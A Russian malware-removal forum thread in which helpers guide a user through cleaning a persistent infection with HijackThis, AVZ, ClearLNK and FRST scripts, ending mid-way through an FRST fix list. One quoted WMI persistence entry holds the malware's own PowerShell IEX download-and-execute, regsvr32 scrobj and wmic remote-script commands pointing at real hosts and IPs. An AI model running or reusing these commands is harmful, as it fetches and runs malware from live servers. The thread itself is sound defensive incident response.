CollectionLog-2021.08.24-12.58.zip
Появляется conhoy.exe
Удаляешь его и он вновь появляется раз в 3 часа.
Вызывает это PowerShell скрипт который запускает что-то из папки C:\Windows\Fonts\Fonts\
CollectionLog-2021.08.24-12.58.zip
Появляется conhoy.exe
Удаляешь его и он вновь появляется раз в 3 часа.
Вызывает это PowerShell скрипт который запускает что-то из папки C:\Windows\Fonts\Fonts\
Уважаемый(ая) lexperience, спасибо за обращение на наш форум!
Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:Код:O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://155.94.235.39:8039/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://155.94.235.39:8039/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.0810bye.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"Компьютер перезагрузится.Код:begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); QuarantineFile('C:\Users\user\AppData\Local\syslog\syslog.exe', ''); QuarantineFile('c:\windows\fonts\fonts\svchost.exe', ''); QuarantineFile('C:\windows\fonts\My\svchost.exe', ''); QuarantineFile('C:\Windows\Fonts\Mysql\svchost.exe', ''); QuarantineFile('C:\Windows\Fonts\smss.exe', ''); QuarantineFile('C:\Windows\Microsoft.NET\Microsoft\svchost.exe', ''); QuarantineFile('C:\Windows\system32\ftp2.txt', ''); QuarantineFile('C:\Windows\system32\ftp5.txt', ''); QuarantineFile('c:\windows\web\1.exe', ''); QuarantineFile('c:\windows\web\2.exe', ''); QuarantineFile('c:\windows\web\3.exe', ''); QuarantineFile('c:\windows\web\n.exe', ''); DeleteFile('C:\Program Files\Avast Software\Avast\AvEmUpdate.exe', '32'); DeleteFile('C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe', '64'); DeleteFile('C:\Program Files\Common Files\avast software\overseer\overseer.exe', '64'); DeleteFile('C:\Users\user\AppData\Local\syslog\syslog.exe', '64'); DeleteFile('c:\windows\fonts\fonts\svchost.exe', '64'); DeleteFile('C:\windows\fonts\My\svchost.exe', '64'); DeleteFile('C:\Windows\Fonts\Mysql\svchost.exe', '64'); DeleteFile('C:\Windows\Fonts\smss.exe', ''); DeleteFile('C:\Windows\Microsoft.NET\Microsoft\svchost.exe', '64'); DeleteFile('C:\Windows\system32\ftp2.txt', '64'); DeleteFile('C:\Windows\system32\ftp5.txt', '64'); DeleteFile('c:\windows\web\1.exe', '64'); DeleteFile('c:\windows\web\2.exe', '64'); DeleteFile('c:\windows\web\3.exe', '64'); DeleteService('aswbIDSAgent'); DeleteService('avast! Antivirus'); DeleteService('ECSIoDriver_1_1_0_0'); DeleteService('MicrosoftMysql'); DeleteService('niarbk'); DeleteService('nibffrk'); DeleteService('nicdrk'); DeleteService('Nidaq32k'); DeleteService('nidevldu'); DeleteService('nidimk'); DeleteService('nidmmk'); DeleteService('nidmxfk'); DeleteService('nidsark'); DeleteService('niesrk'); DeleteService('nilvaik'); DeleteService('nimdbgk'); DeleteService('nimdsk'); DeleteService('nimru2k'); DeleteService('nimsdrk'); DeleteService('nimslk'); DeleteService('nimsrlk'); DeleteService('nimstsk'); DeleteService('nimxdfk'); DeleteService('nimxpk'); DeleteService('niorbk'); DeleteService('NIPALK'); DeleteService('nipxirmk'); DeleteService('nipxirmu'); DeleteService('niscdk'); DeleteService('nisdigk'); DeleteService('nispdk'); DeleteService('nissrk'); DeleteService('nistc2k'); DeleteService('nistck'); DeleteService('nistcrk'); DeleteService('niswdk'); DeleteService('nitiork'); DeleteService('niwfrk'); DeleteService('nixsrk'); DeleteService('OfficeSoft'); DeleteService('QHActiveDefense'); DeleteService('UbarCalloutDriver'); DeleteService('WinIniter'); DeleteService('WinIniters'); DeleteFileMask('c:\users\user\appdata\local\syslog', '*', true); DeleteDirectory('c:\users\user\appdata\local\syslog'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved', '{472083B0-C522-11CF-8763-00608CC02F24}', 'x64'); RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\QHSafeTray', 'x64'); DeleteSchedulerTask('{5E3166BF-0DAF-47A1-BB40-63171950E5CE}'); DeleteSchedulerTask('syslog'); DeleteSchedulerTask('Update2'); DeleteSchedulerTask('Update3'); DeleteSchedulerTask('Update4'); DeleteSchedulerTask('Windows_Update'); DeleteSchedulerTask('WindowsUpdate1'); DeleteSchedulerTask('WindowsUpdate3'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 3, 3, true); RebootWindows(true); end.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.
Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".Отчёт о работе прикрепите.Код:>>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kerbal Space Program\Kerbal Space Program.lnk" -> ["D:\КСП\Kerbal Space Program\KSP_x64.exe"] >>> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WXtoImg\Manual.lnk" -> ["C:\Program Files (x86)\WXtoImg\wxgui.pdf"] >>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kerbal Space Program\Удалить игру.lnk" -> ["D:\КСП\Kerbal Space Program\unins000.exe"] >>> "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Orbitron Screen Saver.lnk" -> ["C:\Windows\System32\Orbitron.scr"] >>> "C:\Users\user\Desktop\Программы для работы\Google Earth.lnk" -> ["C:\Program Files (x86)\Google\Google Earth\client\googleearth.exe"] >>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Scratch\Scratch.lnk" -> ["C:\Program Files (x86)\Scratch\Scratch.exe" =>> "C:\Program Files (x86)\Scratch\Scratch.image"] >>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Scratch\Uninstall Scratch.lnk" -> ["C:\Program Files (x86)\Scratch\uninstall.exe"] >>> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UmmyVideoDownloader\Help\Русский.lnk" -> ["C:\Users\user\AppData\Local\UmmyVideoDownloader\1.7.2.4\help\Ummy_rus.pdf"] >>> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UmmyVideoDownloader\Help\English.lnk" -> ["C:\Users\user\AppData\Local\UmmyVideoDownloader\1.7.2.4\help\Ummy_eng.pdf"] >>> "C:\Users\user\Desktop\Другие программы\Google Earth Pro.lnk" -> ["C:\Program Files (x86)\Google\Google Earth Pro\client\googleearth.exe"] >>> "C:\Users\user\Desktop\Программы для работы\Skype.lnk" -> ["C:\Program Files (x86)\Skype\Phone\Skype.exe"] >>> "C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Viber.lnk" -> ["C:\Users\user\AppData\Local\Viber\Viber.exe" =>> ShareFiles] >>> "C:\Users\user\Desktop\Игры\Epic Games Launcher.lnk" -> ["D:\эпикгамес\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe"] >>> "C:\Users\user\Downloads\Файлы Mail.Ru Агента\Mail.ru Agent\Можно\neptun2\neptun2\A.PIF" -> ["C:\WORKING\NEPTUN\A.EXE"] >>> "C:\Users\user\Downloads\Файлы Mail.Ru Агента\Mail.ru Agent\Можно\neptun2\neptun2\N.PIF" -> ["C:\WORKING\NEPTUN\N.EXE"] >>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\360 Total Security.lnk" -> ["C:\Program Files (x86)\360\Total Security\QHSafeMain.exe"] >>> "C:\Users\Public\Desktop\360 Total Security.lnk" -> ["C:\Program Files (x86)\360\Total Security\QHSafeMain.exe"] >>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\360 Security Center\360 Total Security\Уязвимости.lnk" -> ["C:\Program Files (x86)\360\Total Security\QHSafeMain.exe" =>> /leakfix] >>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Borland C++Builder 6\Help\Intranet ActiveX Online Help.lnk" -> ["C:\Program Files (x86)\Borland\CBuilder6\Help\nia.hlp"] >>> "C:\Users\user\Desktop\Другие программы\Movavi Video Editor 15.lnk" -> ["E:\Movavi\Movavi Video Editor 15\VideoEditor.exe"] >>> "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Super Bunny man\Деинсталлировать awd.lnk" -> ["D:\Super Bunny Man\Super Bunny Man\Super Bunny man\Uninstall\unins000.exe"]
Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.
Нажмите кнопку Сканировать.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
WBR,
Vadim
Вот отчеты
Выделите и скопируйте в буфер обмена следующий код:Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.Код:Start:: CreateRestorePoint: GroupPolicy: Ограничение - Chrome <==== ВНИМАНИЕ Task: {01C18C21-ECEA-4B5E-AD03-46CDBFA8042E} - \Mysa -> Нет файла <==== ВНИМАНИЕ Task: {0CE665BC-7A55-4FC4-B8F6-478A1889C016} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe Task: {23BCF218-F9A3-453C-9B50-1AC3982E5D3E} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\avast software\overseer\overseer.exe [1760360 2020-08-29] (Avast Software s.r.o. -> Avast Software) Task: {3A820F8D-4A74-4235-A585-A86D265A4530} - \ok -> Нет файла <==== ВНИМАНИЕ Task: {5F5278CB-0A8E-46E1-AF1F-B6A5413C39AD} - \oka -> Нет файла <==== ВНИМАНИЕ Task: {6B17F88A-CBED-4107-ABA6-1C0F4587C3DC} - \Mysa1 -> Нет файла <==== ВНИМАНИЕ Task: {DAF93FCE-EDC8-49A5-AD2A-344C4439ACDF} - \Mysa3 -> Нет файла <==== ВНИМАНИЕ Task: {E394AFCF-5D66-46D4-92C5-86C3CC99AA86} - \Mysa2 -> Нет файла <==== ВНИМАНИЕ Task: C:\Windows\Tasks\Avast Emergency Update.job => C:\Program Files\Avast Software\Avast\AvEmUpdate.exe CHR HKU\S-1-5-21-2322360559-2472836408-2810273341-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb] CHR HKLM-x32\...\Chrome\Extension: [glcimepnljoholdmjchkloafkggfoijh] S2 IPSAFES; C:\Windows\Fonts\lsass.exe [0 2019-08-12] () <==== ВНИМАНИЕ (нулевой байт Файл/Папка) C:\Windows\Fonts\lsass.exe S3 aswbIDSAgent; "C:\Program Files\Avast Software\Avast\aswidsagent.exe" [X] S2 avast! Antivirus; "C:\Program Files\Avast Software\Avast\AvastSvc.exe" /runassvc [X] 2019-08-12 12:13 - 2019-08-12 12:13 - 000000000 ____D () C:\ProgramData\svhost.exe 2016-12-18 18:10 - 2016-12-18 18:10 - 000000001 _RHOT () C:\Program Files\My Web Shield 2016-12-18 18:10 - 2016-12-18 18:10 - 000000001 _RHOT () C:\Program Files\UBar 2016-12-18 18:10 C:\Program Files (x86)\Smart Application Controller 2016-12-18 18:10 C:\Program Files (x86)\Youtube AdBlock 2016-12-18 18:10 C:\ProgramData\hdtask 2016-12-18 18:10 C:\ProgramData\UBar 2016-12-18 18:10 C:\Users\user\AppData\Roaming\PBot 2016-12-18 18:10 C:\Users\user\AppData\Roaming\PriceNavigator 2016-12-18 18:10 C:\Users\user\AppData\Roaming\SimpleCalculator 2016-12-18 18:10 C:\Users\user\AppData\Roaming\Smart Application Controller 2016-12-18 18:10 C:\Users\user\AppData\Roaming\VulcanLinks 2016-12-18 18:10 C:\Users\user\AppData\Local\calk 2016-12-18 18:10 C:\Users\user\AppData\Local\fupdate S2 conhost; C:\Program Files (x86)\Google\13994553.dll [X] R1 360AntiHacker; C:\Windows\System32\Drivers\360AntiHacker64.sys [190680 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn) S3 360AvFlt; C:\Windows\System32\DRIVERS\360AvFlt.sys [86248 2020-08-31] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn) R1 360Box64; C:\Windows\System32\DRIVERS\360Box64.sys [337280 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn) S3 360Camera; C:\Windows\System32\Drivers\360Camera64.sys [49088 2020-08-31] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn) R1 360FsFlt; C:\Windows\System32\DRIVERS\360FsFlt.sys [457672 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn) S4 360Hvm; C:\Windows\System32\Drivers\360Hvm64.sys [322944 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360安全中心) S3 360netmon; C:\Windows\System32\DRIVERS\360netmon.sys [87672 2020-08-31] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn) R1 BAPIDRV; C:\Windows\System32\DRIVERS\BAPIDRV64.sys [219520 2020-08-31] (Beijing Qihu Technology Co., Ltd. -> 360.cn) U3 aswbdisk; отсутствует ImagePath U3 aswblog; отсутствует ImagePath C:\Windows\System32\Drivers\360AntiHacker64.sys C:\Windows\System32\DRIVERS\360AvFlt.sys C:\Windows\System32\DRIVERS\360Box64.sys C:\Windows\System32\Drivers\360Camera64.sys C:\Windows\System32\DRIVERS\360FsFlt.sys C:\Windows\System32\Drivers\360Hvm64.sys C:\Windows\System32\DRIVERS\360netmon.sys C:\Windows\System32\DRIVERS\BAPIDRV64.sys ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла ContextMenuHandlers4: [SD360] -> {086F171D-5ED1-4ED2-B736-CFF3AD6A128E} => C:\Program Files (x86)\360\Total Security\MenuEx64.dll -> Нет файла ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\Avast Software\Avast\ashShell.dll -> Нет файла ContextMenuHandlers6: [SD360] -> {086F171D-5ED1-4ED2-B736-CFF3AD6A128E} => C:\Program Files (x86)\360\Total Security\MenuEx64.dll -> Нет файла AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0] HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\72983560.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\72983560.sys => ""="Driver" SearchScopes: HKU\S-1-5-21-2322360559-2472836408-2810273341-1000 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://go-search.ru/search?q={searchTerms} BHO-x32: Поиск@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\user\AppData\Local\Mail.Ru\Sputnik\IESearchPlugin.dll => Нет файла BHO-x32: SafeMon Class -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> C:\Program Files (x86)\360\Total Security\safemon\safemon.dll => Нет файла BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll => Нет файла MSCONFIG\startupreg: ctfmon => C:\Windows\Fonts\lsass.exe C:\Program Files (x86)\360\Total Security FirewallRules: [{CCC877C1-0690-4257-9542-61B4F09614B8}] => (Allow) C:\Program Files\UBar\ubar.exe => Нет файла FirewallRules: [TCP Query User{6795AA6A-9235-4468-8ED8-81C0673914A9}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe => Нет файла FirewallRules: [UDP Query User{7A13CE18-5EDE-4311-85C0-EE0791111BEC}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn.exe => Нет файла FirewallRules: [TCP Query User{8548ED64-D023-444F-BB6C-168A11BAA40E}C:\users\user\appdata\local\mediaget2\mediaget.exe] => (Block) C:\users\user\appdata\local\mediaget2\mediaget.exe => Нет файла FirewallRules: [UDP Query User{172CF716-F833-4FCF-BEF7-8C421C681213}C:\users\user\appdata\local\mediaget2\mediaget.exe] => (Block) C:\users\user\appdata\local\mediaget2\mediaget.exe => Нет файла FirewallRules: [TCP Query User{9AFDE64F-8C66-4A88-9574-91F10E233A17}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла FirewallRules: [UDP Query User{3A3E7546-0204-4702-90AC-CC92E38DCF2C}C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) C:\games\hello neighbor alpha 2\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла FirewallRules: [TCP Query User{3D294330-B21D-4240-ABF4-6E79387B3A84}D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe => Нет файла FirewallRules: [UDP Query User{D4B21FAA-2A83-4456-9965-4C83E8C48BD1}D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win32\epicgameslauncher.exe => Нет файла FirewallRules: [TCP Query User{29F98A47-8F9E-4E23-A218-9984D38EB176}D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe => Нет файла FirewallRules: [UDP Query User{6BE6EFC4-5A4F-4957-BA20-47486CCC6C15}D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\эпикгамес\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe => Нет файла FirewallRules: [TCP Query User{AF36DDC7-221D-4753-BA88-CFA1F348FB7C}D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe => Нет файла FirewallRules: [UDP Query User{BCE3AF80-0ACD-4D25-A3B8-7B1152232DB9}D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\win64\ue4editor.exe => Нет файла FirewallRules: [TCP Query User{C50544F2-1E96-4031-A068-302E95DCC223}D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe => Нет файла FirewallRules: [UDP Query User{A3319220-92CD-4EFC-AF56-DB03426EED15}D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe] => (Allow) D:\эпикгамес\hellodevkit\engine\binaries\dotnet\swarmagent.exe => Нет файла FirewallRules: [TCP Query User{674E2599-23BA-4BBF-8AFB-6E2212EA6BD3}D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла FirewallRules: [UDP Query User{CF339C0E-21C0-4CFD-9EC8-42E3AD92E5E3}D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) D:\hello neighbor alpha 1\hello neighbor alpha 1\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe => Нет файла FirewallRules: [TCP Query User{7D979D98-9A73-4B8C-99A3-C2AF556A1096}C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe] => (Allow) C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe => Нет файла FirewallRules: [UDP Query User{40BDD61E-4A62-45B2-8632-923FBAAF2D85}C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe] => (Allow) C:\users\user\downloads\icq\icq\sdrsharp 2\sdrsharp\adsbsharp.exe => Нет файла FirewallRules: [{8ADD07F2-9134-418F-BA1F-6315F36D6029}] => (Allow) D:\Winamp\winamp.exe => Нет файла FirewallRules: [{546A58F9-FE2E-4C76-A006-E3F25BED7B39}] => (Allow) D:\Winamp\winamp.exe => Нет файла FirewallRules: [TCP Query User{1AFF9F98-FFC3-4D0A-93AE-C38EFBDC92BF}C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe] => (Allow) C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe => Нет файла FirewallRules: [UDP Query User{F5930C31-7A32-4C9A-BDCC-BC58FD23BAE0}C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe] => (Allow) C:\users\user\downloads\файлы mail.ru агента\mail.ru agent\landsim\landsim\server\simulator.exe => Нет файла FirewallRules: [TCP Query User{6A4584F6-D362-4FC6-A731-89101AF3F4DB}D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe] => (Block) D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe => Нет файла FirewallRules: [UDP Query User{087E997D-9C78-47AA-882C-07ADAEAA2B09}D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe] => (Block) D:\download\hideandseek\hideandseek\helloneighbor\binaries\win64\helloneighbor-win64-shipping.exe => Нет файла FirewallRules: [TCP Query User{481AD368-8107-4CA6-BB62-503575B2C84A}D:\1\инпу нептун-мэ\server\simulator.exe] => (Allow) D:\1\инпу нептун-мэ\server\simulator.exe => Нет файла FirewallRules: [UDP Query User{56FA2711-ACEC-40C6-ACE6-75D2F47FA8CD}D:\1\инпу нептун-мэ\server\simulator.exe] => (Allow) D:\1\инпу нептун-мэ\server\simulator.exe => Нет файла FirewallRules: [{6A861891-2505-4EF2-BC1E-7CF08974F695}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\tcpcom.exe => Нет файла FirewallRules: [{0805A51D-B04C-4363-96E4-32761C90EA78}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\tcpcom.exe => Нет файла FirewallRules: [{1245AFDE-E5BF-405A-B82B-F7146BEBC8B3}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\onlineactivator.exe => Нет файла FirewallRules: [{F0265202-48EA-437D-9B2F-A0FB88DE4725}] => (Allow) C:\Program Files (x86)\TCP COM Bridge\onlineactivator.exe => Нет файла FirewallRules: [{5F5747B9-6C1C-4235-92F7-52E77C9019F4}] => (Block) LPort=139 FirewallRules: [{4DFFC814-BFF6-441E-A699-4700CCB82ED5}] => (Block) LPort=445 FirewallRules: [{E50F0281-E106-4EE6-8752-225204036708}] => (Block) LPort=139 FirewallRules: [{C1AD65BA-C529-45D2-8E6C-EF0ADBE88F58}] => (Block) LPort=445 FirewallRules: [{3B91FDD6-96EC-460C-BF48-BDA5312F5FDA}] => (Block) LPort=139 FirewallRules: [{A8BD5F90-6A39-4141-BBEA-1EA2FDD4154F}] => (Block) LPort=445 FirewallRules: [{E106989E-349D-425D-A870-B1EE565108EE}] => (Block) LPort=139 FirewallRules: [{89277402-E6B1-4AFC-B0D1-5982D37A1D43}] => (Block) LPort=445 FirewallRules: [{1011CF0E-26B6-4D68-8AF9-4C11B0079BEE}] => (Block) LPort=139 FirewallRules: [{5CF5ED9F-6DE7-4DB6-AB4B-DCF1A66C877E}] => (Block) LPort=445 FirewallRules: [{C77F0541-62AA-4696-8B33-16CA497D0CA7}] => (Block) LPort=139 FirewallRules: [{FD592B4B-25A3-4833-AD0D-2D663552C49D}] => (Block) LPort=445 FirewallRules: [{C5055AF4-9C15-4B0B-A83B-9163D6106A68}] => (Block) LPort=139 FirewallRules: [{5A17AB39-E438-45D7-B729-9D25888DB836}] => (Block) LPort=445 FirewallRules: [{F62D4A98-F6FA-4365-A734-4DBD6D5990E4}] => (Block) LPort=139 FirewallRules: [{C7A8193D-3910-420B-967B-093B37418C2A}] => (Block) LPort=445 FirewallRules: [{2CE93B8E-C0B4-4587-A4F7-2B21C91A7697}] => (Block) LPort=139 FirewallRules: [{5E682B40-5C84-4622-978C-5863322E58EF}] => (Block) LPort=445 FirewallRules: [{91628AFE-586D-48A3-B6CE-326B784D50CF}] => (Block) LPort=139 FirewallRules: [{2643AC6F-C3C2-4A01-86CB-9E086DF062A4}] => (Block) LPort=445 FirewallRules: [{59378E9A-57F1-4C01-B6DB-B08A9C18889A}] => (Block) LPort=139 FirewallRules: [{BADA7B63-02BE-49F5-8427-4D82A8760F22}] => (Block) LPort=445 FirewallRules: [{0C62F18D-82FE-4A1A-843D-D2D176AA131A}] => (Block) LPort=139 FirewallRules: [{DBF10C81-44E5-4F52-B55F-00C14C4C19D0}] => (Block) LPort=445 FirewallRules: [{737FF17C-2E59-44EF-AE0D-9BB43EC6C7F7}] => (Block) LPort=139 FirewallRules: [{F98C8CFA-84BD-45D4-8B25-3A7C00E6FAD6}] => (Block) LPort=139 FirewallRules: [{288D8FED-5B43-4AA7-8EB6-50023FC46EE7}] => (Block) LPort=445 FirewallRules: [{BAE33902-11E4-40A5-AE46-E537DCDEF1A8}] => (Block) LPort=445 FirewallRules: [{BE13D01B-5366-41EF-98D4-0D0CE6E2BCED}] => (Block) LPort=139 FirewallRules: [{7E589B4E-977E-4176-9A2D-9B4D223D755B}] => (Block) LPort=445 FirewallRules: [{A8266260-EF5D-4435-AEA8-A65F5D43972C}] => (Block) LPort=139 FirewallRules: [{3095AD51-A8F0-4DFA-B9BF-B6DA5C81EB9C}] => (Block) LPort=445 FirewallRules: [{73DB4631-7632-42DC-ADF3-AFFCA451FF30}] => (Block) LPort=139 FirewallRules: [{F3F01CD5-77D8-44B6-BE85-C9FD3501619B}] => (Block) LPort=139 FirewallRules: [{62101226-A22D-45AF-9B96-A957948150B6}] => (Block) LPort=445 FirewallRules: [{DAD5B0D8-A242-4218-8EF7-0543FDCB27F8}] => (Block) LPort=445 FirewallRules: [{2617E527-AA0C-4EC5-82C8-896BE1971541}] => (Block) LPort=139 FirewallRules: [{8EBD1686-6139-414F-A293-28C8ECC5A265}] => (Block) LPort=139 FirewallRules: [{25F5CF92-99FA-4E97-8A10-75ECD8003951}] => (Block) LPort=445 FirewallRules: [{C939DD1F-D195-43F0-86E4-9E94E6C22E5D}] => (Block) LPort=445 FirewallRules: [{0B3B15BE-C492-4432-8B4B-F540ECF5F677}] => (Block) LPort=139 FirewallRules: [{21BBD363-8DA0-4799-A4E0-A7A3971512FA}] => (Block) LPort=139 FirewallRules: [{3BDC4CEB-D90C-4D29-A061-8652704C09AE}] => (Block) LPort=445 FirewallRules: [{766D920F-6D4A-4807-94AE-37E7C57644B9}] => (Block) LPort=445 FirewallRules: 